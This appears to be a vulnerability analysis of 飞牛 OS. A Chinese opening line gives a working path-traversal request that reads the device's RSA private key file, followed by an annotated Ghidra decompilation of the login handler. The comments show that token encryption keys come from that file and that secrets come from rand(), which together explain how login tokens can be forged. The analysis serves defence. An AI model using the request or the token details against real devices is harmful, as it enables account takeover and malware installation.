攻击者通过 http://x.x.x.x:5666(5667)/app-center-static/serviceicon/myapp/%7B0%7D?size=../../../../usr/trim/etc/rsa_private_key.pem 这个 LFI 请求读取受害者的 rsa_private_key.pem；rsa_private_key.pem 用来计算登录用 cookie 中的 longtoken，攻击者可能是通过这个 LFI 漏洞获取到 longtoken 之后登录了飞牛 OS，然后下发并持久化木马。
/usr/trim/bin/handlers/user.hdl
/*
 * Ghidra decompilation of do_login() from /usr/trim/bin/handlers/user.hdl.
 * This is not compilable C++: decompiler artefacts (undefined8, secret._0_8_,
 * fully-qualified static-local names, "Unresolved local var" notes, line-wrap
 * damage such as "inherited_secre t") are kept verbatim.  The comments below
 * describe only what the listing itself shows.
 *
 * Purpose: complete a login of `uid` on `session`, writing "uid", "admin",
 * "token", optionally "longToken" / "secret", then "backId" and "machineId"
 * into `result` (a PPJson::MutValue accessed through its vtable slot at +0x18).
 *
 * Parameters (as recovered; anything beyond the listing is unverified):
 *   session          - session id used with query_session / add_session
 *   uid              - user id being logged in
 *   stay_login       - 0: session token only; 2: long token that never expires
 *                      (overtime 999999999999); any other non-zero value: long
 *                      token valid for now + 0x278d00 s (30 days)
 *   long_token       - existing long token, or NULL to mint a new one
 *   inherited_secret - 16 bytes copied into `secret` when non-NULL; otherwise
 *                      `secret` is generated from rand()
 *   handler_extra    - provides aes_key / aes_iv and a flag byte at +0x20
 *   device_name, device_type, did - client identification, each may be NULL
 *   result           - JSON output object
 *
 * Security-relevant facts visible in this listing (defender's summary):
 *   - `secret`, token[0..3], token[12..15] and backid[0..3] are taken from libc
 *     rand(), which is not a cryptographically secure generator.
 *   - The AES key that protects "token" and "longToken" is 32 bytes read from
 *     offset 100 of /usr/trim/etc/rsa_private_key.pem, cached per thread and
 *     re-read when the file's mtime changes.  Anyone who can read that file
 *     holds the key behind every issued token; mitigations are strict file
 *     permissions, key rotation, and deriving the token key from a dedicated
 *     secret rather than from the RSA key file.
 *   - SQL goes through ezpq::execp with $n placeholders (parameterised); the
 *     connection string uses the `postgres` role over a unix socket, so a
 *     dedicated least-privilege role would reduce blast radius.
 *   - `st` (a stat64) and local_2a8 / local_2c8 are reused as sprintf scratch
 *     buffers; that is stack-slot reuse as seen by the decompiler, not a bug.
 */
void do_login(uint64_t session,uid_t uid,int stay_login,uchar *long_token,uchar *inherited_secre t,
handler_extra_t *handler_extra,char *device_name,char *device_type,char *did,
MutValue *result)
{
long lVar1;
bool bVar2;
int iVar3;
MutValue *pMVar4;
passwd *ppVar5;
time_t tVar6;
long *plVar7;
__time_t *p_Var8;
pthread_t pVar9;
uchar *puVar10;
ulong uVar11;
char *pcVar12;
ezpq *peVar13;
char *pcVar14;
void *pvVar15;
undefined8 *puVar16;
undefined1 *puVar17;
long lVar18;
char cVar19;
long in_FS_OFFSET;
uid_t _uid;
undefined1 local_2c8 [32];
undefined1 local_2a8 [32];
stat64 st;
uchar secret [16];
char token [32];
char backid [32];
char machine_id [64];
/* Unresolved local var: bool ret@[???]
Unresolved local var: passwd * pw@[???] */
/* cVar19 becomes the "admin" flag; it is only set when the passwd lookup succeeds */
cVar19 = false;
/* Stack-protector canary, verified again before return */
lVar1 = *(long *)(in_FS_OFFSET + 0x28);
/* result["uid"] = uid */
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"uid");
PPJson::MutValue::operator=(pMVar4,uid);
/* Passwd lookup under the shared read lock.  As decompiled, "admin" is the
   first byte of pw_shell cast to bool, i.e. true whenever pw_shell is
   non-empty; the real predicate may have been flattened by the decompiler
   - confirm against the source/binary. */
pthread_rwlock_rdlock((pthread_rwlock_t *)&locker_passwd_group);
ppVar5 = getpwuid_q(uid);
if (ppVar5 != (passwd *)0x0) {
cVar19 = *ppVar5->pw_shell;
}
pthread_rwlock_unlock((pthread_rwlock_t *)&locker_passwd_group);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"admin");
PPJson::MutValue::operator=(pMVar4,(bool)cVar19);
/* Fast path: the session already maps to a token that belongs to this uid.
   Refresh it and skip token/secret generation entirely. */
bVar2 = query_session(session,token);
if (((bVar2) && (bVar2 = query_token(token,&_uid), bVar2)) && (_uid == uid)) {
refresh_token(token);
goto LAB_0010cb9b;
}
/* Build the 16-byte `secret`.  Without an inherited secret it is four rand()
   outputs packed little-endian; the final byte is then overwritten with 'o',
   so only 15 bytes carry PRNG output (matching the 0xf length passed to
   aes_encrypt below).  rand() is not a CSPRNG - a getrandom()-backed source
   would be the appropriate replacement. */
if (inherited_secret == (uchar *)0x0) {
iVar3 = rand();
secret[0] = (char)iVar3;
secret[1] = (char)((uint)iVar3 >> 8);
secret[2] = (char)((uint)iVar3 >> 0x10);
secret[3] = (char)((uint)iVar3 >> 0x18);
iVar3 = rand();
secret[4] = (char)iVar3;
secret[5] = (char)((uint)iVar3 >> 8);
secret[6] = (char)((uint)iVar3 >> 0x10);
secret[7] = (char)((uint)iVar3 >> 0x18);
iVar3 = rand();
secret[8] = (char)iVar3;
secret[9] = (char)((uint)iVar3 >> 8);
secret[10] = (char)((uint)iVar3 >> 0x10);
secret[0xb] = (char)((uint)iVar3 >> 0x18);
iVar3 = rand();
secret[0xc] = (char)iVar3;
secret[0xd] = (char)((uint)iVar3 >> 8);
secret[0xe] = (char)((uint)iVar3 >> 0x10);
secret[0xf] = (char)((uint)iVar3 >> 0x18);
secret[0xf] = 'o';
}
else {
/* Caller-supplied secret: copy 16 bytes verbatim (no length is passed in) */
secret._0_8_ = *(undefined8 *)inherited_secret;
secret._8_8_ = *(undefined8 *)(inherited_secret + 8);
}
/* Function-local statics, initialised once under the C++ static guard:
   mask_rand is a per-process XOR mask, token_inc a process-wide atomic
   counter.  Both are seeded from rand(). */
if ((do_login(unsigned_long,unsigned_int,int,unsigned_char*,unsigned_char*,handler_extra_t*,char_ const*,char_const*,char_const*,PPJson::MutValue&)
::mask_rand == '\0') && (iVar3 = __cxa_guard_acquire(), iVar3 != 0)) {
do_login::lexical_block_0::mask_rand = rand();
__cxa_guard_release();
}
if ((do_login(unsigned_long,unsigned_int,int,unsigned_char*,unsigned_char*,handler_extra_t*,char_ const*,char_const*,char_const*,PPJson::MutValue&)
::token_inc == '\0') && (iVar3 = __cxa_guard_acquire(), iVar3 != 0)) {
do_login::lexical_block_0::token_inc.super___atomic_base<int>._M_i = (__atomic_base<int>)ran d();
__cxa_guard_release();
}
/* Plaintext half of the 32-byte session token:
     token[0..3]   rand()
     token[4..7]   low 32 bits of time(NULL)
     token[8..11]  token_inc ^ mask_rand
     token[12..15] rand()
   token[16..31] is filled by aes_encrypt further down. */
token._0_4_ = rand();
tVar6 = time((time_t *)0x0);
token._4_4_ = (undefined4)tVar6;
/* Unresolved local var: memory_order __b@[???] */
token._8_4_ = (uint)do_login::lexical_block_0::token_inc.super___atomic_base<int>._M_i ^
do_login::lexical_block_0::mask_rand;
token._12_4_ = rand();
/* Atomic post-increment of token_inc (LOCK/UNLOCK = lock-prefixed add) */
LOCK();
do_login::lexical_block_0::token_inc.super___atomic_base<int>._M_i =
(__atomic_base<int>)
((int)do_login::lexical_block_0::token_inc.super___atomic_base<int>._M_i + 1);
UNLOCK();
/* Thread-local AES key cache (inlined get_secret_aeskey(), per the assert
   text below).  The key is 32 bytes at offset 100 of the RSA private key
   file, re-read only when st_mtim differs from the cached (sec, nsec) pair
   held in TLS at PTR_00134fa8.  Note: the return value of read() is never
   checked, so a short read would leave part of the cached key unchanged,
   and a failed stat64() silently keeps whatever key was cached before.
   0x80000 is most likely O_CLOEXEC on this target - confirm. */
iVar3 = stat64("/usr/trim/etc/rsa_private_key.pem",(stat64 *)&st);
if ((iVar3 == 0) &&
((plVar7 = (long *)__tls_get_addr(&PTR_00134fa8), st.st_mtim.tv_sec != *plVar7 ||
(st.st_mtim.tv_nsec != plVar7[1])))) {
/* Unresolved local var: int fd@[???] */
iVar3 = open("/usr/trim/etc/rsa_private_key.pem",0x80000);
if (-1 < iVar3) {
lseek(iVar3,100,0);
pvVar15 = (void *)__tls_get_addr(&PTR_00134f88);
read(iVar3,pvVar15,0x20);
close(iVar3);
}
p_Var8 = (__time_t *)__tls_get_addr(&PTR_00134fa8);
*p_Var8 = st.st_mtim.tv_sec;
p_Var8[1] = st.st_mtim.tv_nsec;
pVar9 = pthread_self();
__fprintf_chk(_stdout,1,"[%lu]cache secret from file\n",pVar9);
}
/* token[16..31] = aes_encrypt(secret[0..14], key = cached file bytes,
   token[0..15] as the 4th argument, output at token+16).  The argument
   order (key vs. IV) is inferred from the assert string, not proven here. */
puVar10 = (uchar *)__tls_get_addr(&PTR_00134f88);
iVar3 = aes_encrypt(secret,0xf,puVar10,(uchar *)token,(uchar *)(token + 0x10));
if (iVar3 != 0x10) {
/* WARNING: Subroutine does not return */
__assert_fail("aes_encrypt(secret, 15, get_secret_aeskey(), (unsigned char *)token, (unsigned c har *)&token[16]) == 16"
,"/linux-dev/trim/handler_user/user.cpp",0x659,
"void do_login(uint64_t, uid_t, int, unsigned char*, unsigned char*, handler_extra _t*, const char*, const char*, const char*, PPJson::MutValue&)"
);
}
/* No existing long token: either a plain session (stay_login == 0) or mint
   a new long token. */
if (long_token == (uchar *)0x0) {
if (stay_login == 0) {
/* Plain session with a device id: drop any long token previously issued
   to this (did, uid).  The thread-local ezpq connection is lazily
   constructed here (flag at PTR_00134f40, object at PTR_00134fc8) and
   registered with __cxa_thread_atexit for destruction. */
if ((did != (char *)0x0) && (*did != '\0')) {
pcVar12 = (char *)__tls_get_addr(&PTR_00134f40);
if (*pcVar12 == '\0') {
*pcVar12 = '\x01';
puVar16 = (undefined8 *)__tls_get_addr(&PTR_00134fc8);
*puVar16 = "host=/var/run/postgresql user=postgres dbname=trim";
puVar16[1] = 0;
*(undefined4 *)(puVar16 + 2) = 0;
__cxa_thread_atexit(ezpq::~ezpq,puVar16,&__dso_handle);
}
/* `st` reused as a 32-byte scratch buffer for the decimal uid */
__sprintf_chk(&st,1,0x20,"%d",uid);
peVar13 = (ezpq *)__tls_get_addr(&PTR_00134fc8);
ezpq::execp(peVar13,"DELETE FROM longtoken WHERE did=$1 AND uid=$2",did,&st,0);
}
/* Session token without a long token; a duplicate is only logged */
bVar2 = add_token(token,uid,(uchar *)0x0,did);
if (!bVar2) {
puts("token is exists.");
}
}
else {
/* Unresolved local var: uint64_t checksum@[???]
Unresolved local var: passwd * pw@[???] */
/* Lookup result discarded as decompiled; the lock is taken and released
   around it anyway. */
pthread_rwlock_rdlock((pthread_rwlock_t *)&locker_passwd_group);
getpwuid_q(uid);
pthread_rwlock_unlock((pthread_rwlock_t *)&locker_passwd_group);
/* Plaintext half of the long token (`backid` is reused as its buffer):
     backid[0..3]  rand()
     backid[4..7]  uid
     backid[8..15] time(NULL) + 0x278d00 (30 days)
   backid[16..31] is filled by aes_encrypt below. */
backid._0_4_ = rand();
backid._4_4_ = uid;
tVar6 = time((time_t *)0x0);
backid._8_8_ = tVar6 + 0x278d00;
/* Second inlined copy of the AES key cache; identical to the one above,
   including the unchecked read() length. */
iVar3 = stat64("/usr/trim/etc/rsa_private_key.pem",(stat64 *)&st);
if ((iVar3 == 0) &&
((plVar7 = (long *)__tls_get_addr(&PTR_00134fa8), st.st_mtim.tv_sec != *plVar7 ||
(st.st_mtim.tv_nsec != plVar7[1])))) {
/* Unresolved local var: int fd@[???] */
iVar3 = open("/usr/trim/etc/rsa_private_key.pem",0x80000);
if (-1 < iVar3) {
lseek(iVar3,100,0);
pvVar15 = (void *)__tls_get_addr(&PTR_00134f88);
read(iVar3,pvVar15,0x20);
close(iVar3);
}
p_Var8 = (__time_t *)__tls_get_addr(&PTR_00134fa8);
*p_Var8 = st.st_mtim.tv_sec;
p_Var8[1] = st.st_mtim.tv_nsec;
pVar9 = pthread_self();
__fprintf_chk(_stdout,1,"[%lu]cache secret from file\n",pVar9);
}
/* backid[16..31] = aes_encrypt(secret[0..14], key, backid[0..15], ...) -
   same key as the session token */
puVar10 = (uchar *)__tls_get_addr(&PTR_00134f88);
iVar3 = aes_encrypt(secret,0xf,puVar10,(uchar *)backid,(uchar *)(backid + 0x10));
if (iVar3 != 0x10) {
/* WARNING: Subroutine does not return */
__assert_fail("aes_encrypt(secret, 15, get_secret_aeskey(), (unsigned char *)long_token, (u nsigned char *)&long_token[16]) == 16"
,"/linux-dev/trim/handler_user/user.cpp",0x674,
"void do_login(uint64_t, uid_t, int, unsigned char*, unsigned char*, handler_e xtra_t*, const char*, const char*, const char*, PPJson::MutValue&)"
);
}
/* NOTE(review): 0x28 (40) bytes are base64-encoded although backid is
   declared as 32 bytes; as decompiled this includes 8 bytes past the array.
   Confirm against the real stack layout before treating it as a defect. */
encode_base64((uchar *)backid,0x28,machine_id);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"longToken");
PPJson::MutValue::operator=(pMVar4,machine_id);
/* Register the session token together with the new long token */
bVar2 = add_token(token,uid,(uchar *)backid,did);
if (!bVar2) {
puts("token is exists.");
}
/* The decompiler dropped the argument here; from its later use as the
   lazy-init flag this is presumably &PTR_00134f40 - verify. */
pcVar12 = (char *)__tls_get_addr();
if ((did == (char *)0x0) || (*did == '\0')) {
/* No device id: plain INSERT into longtoken (no did column) */
if (*pcVar12 == '\0') {
puVar17 = (undefined1 *)__tls_get_addr(&PTR_00134f40);
*puVar17 = 1;
puVar16 = (undefined8 *)__tls_get_addr(&PTR_00134fc8);
*puVar16 = "host=/var/run/postgresql user=postgres dbname=trim";
puVar16[1] = 0;
*(undefined4 *)(puVar16 + 2) = 0;
__cxa_thread_atexit(ezpq::~ezpq,puVar16,&__dso_handle);
}
/* NULL device strings are stored as "" */
pcVar12 = device_type;
if (device_type == (char *)0x0) {
pcVar12 = "";
}
pcVar14 = "";
if (device_name != (char *)0x0) {
pcVar14 = device_name;
}
/* logintime -> st, overtime -> local_2a8, uid -> local_2c8, all as text.
   DAT_0012b22a is a format string the decompiler did not recover.
   stay_login == 2 yields the sentinel 999999999999, i.e. no expiry. */
tVar6 = time((time_t *)0x0);
__sprintf_chk(&st,1,0x20,&DAT_0012b22a,tVar6);
lVar18 = 999999999999;
if (stay_login != 2) {
tVar6 = time((time_t *)0x0);
lVar18 = tVar6 + 0x278d00;
}
__sprintf_chk(local_2a8,1,0x20,&DAT_0012b22a,lVar18);
__sprintf_chk(local_2c8,1,0x20,"%d",uid);
peVar13 = (ezpq *)__tls_get_addr(&PTR_00134fc8);
ezpq::execp(peVar13,
"INSERT INTO longtoken(token,uid,overtime,logintime,device_name,device_type) VAL UES($1,$2,$3,$4,$5,$6)"
,machine_id,local_2c8,local_2a8,&st,pcVar14,pcVar12,0);
}
else {
/* With a device id: upsert keyed on (did, uid), so one long token per
   device and user */
if (*pcVar12 == '\0') {
*pcVar12 = '\x01';
puVar16 = (undefined8 *)__tls_get_addr(&PTR_00134fc8);
*puVar16 = "host=/var/run/postgresql user=postgres dbname=trim";
puVar16[1] = 0;
*(undefined4 *)(puVar16 + 2) = 0;
__cxa_thread_atexit(ezpq::~ezpq,puVar16,&__dso_handle);
}
pcVar12 = device_type;
if (device_type == (char *)0x0) {
pcVar12 = "";
}
pcVar14 = "";
if (device_name != (char *)0x0) {
pcVar14 = device_name;
}
tVar6 = time((time_t *)0x0);
__sprintf_chk(&st,1,0x20,&DAT_0012b22a,tVar6);
lVar18 = 999999999999;
if (stay_login != 2) {
tVar6 = time((time_t *)0x0);
lVar18 = tVar6 + 0x278d00;
}
__sprintf_chk(local_2a8,1,0x20,&DAT_0012b22a,lVar18);
__sprintf_chk(local_2c8,1,0x20,"%d",uid);
peVar13 = (ezpq *)__tls_get_addr(&PTR_00134fc8);
ezpq::execp(peVar13,
"INSERT INTO longtoken(token,uid,overtime,logintime,did,device_name,device_type) VALUES($1,$2,$3,$4,$5,$6,$7) ON CONFLICT(did,uid) DO update set token=$1, overt ime=$3, logintime=$4, device_name=$6, device_type=$7"
,machine_id,local_2c8,local_2a8,&st,did,pcVar14,pcVar12,0);
}
}
/* Return the freshly generated secret to the client (only when it was not
   inherited).  If handler_extra's flag byte has (x & 0xe) == 2 the secret
   is first AES-encrypted with the handler's own key/iv into `backid` and
   the result is skipped unless its length is within 2..128; otherwise the
   16 raw secret bytes are base64-encoded as-is. */
puVar10 = (uchar *)backid;
if (inherited_secret == (uchar *)0x0) {
if ((handler_extra->field_0x20 & 0xe) == 2) {
/* Unresolved local var: int aes_len@[???] */
iVar3 = aes_encrypt(secret,0x10,handler_extra->aes_key,handler_extra->aes_iv,puVar10);
if (0x7e < iVar3 - 2U) goto LAB_0010cb51;
}
else {
iVar3 = 0x10;
puVar10 = secret;
}
encode_base64(puVar10,iVar3,machine_id);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"secret");
PPJson::MutValue::operator=(pMVar4,machine_id);
}
}
else {
/* Login with an existing long token: only bind the new session token to it */
bVar2 = add_token(token,uid,long_token,did);
if (!bVar2) {
puts("token is exists.");
}
}
LAB_0010cb51:
/* Bind the session to the token and emit the 32-byte token base64-encoded */
add_session(session,token);
token_set_login_device(token,device_name,device_type);
encode_base64((uchar *)token,0x20,machine_id);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"token");
PPJson::MutValue::operator=(pMVar4,machine_id);
LAB_0010cb9b:
/* Unresolved local var: uint id@[???] */
/* Common tail (also reached from the session-reuse fast path):
   backId = "%08x%08x" of the low 32 bits of time(NULL) and a process-wide
   counter (_back_id, shared with get_new_backid) incremented atomically. */
add_user_main_session(uid,session,token);
iVar3 = get_new_backid(char*)::_back_id;
LOCK();
get_new_backid(char*)::_back_id = get_new_backid(char*)::_back_id + 1;
UNLOCK();
uVar11 = time((time_t *)0x0);
__sprintf_chk(backid,1,0x20,"%08x%08x",uVar11 & 0xffffffff,iVar3);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"backId");
PPJson::MutValue::operator=(pMVar4,backid);
get_machine_id(machine_id);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"machineId");
PPJson::MutValue::operator=(pMVar4,machine_id);
/* Stack-protector check */
if (lVar1 == *(long *)(in_FS_OFFSET + 0x28)) {
return;
}
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}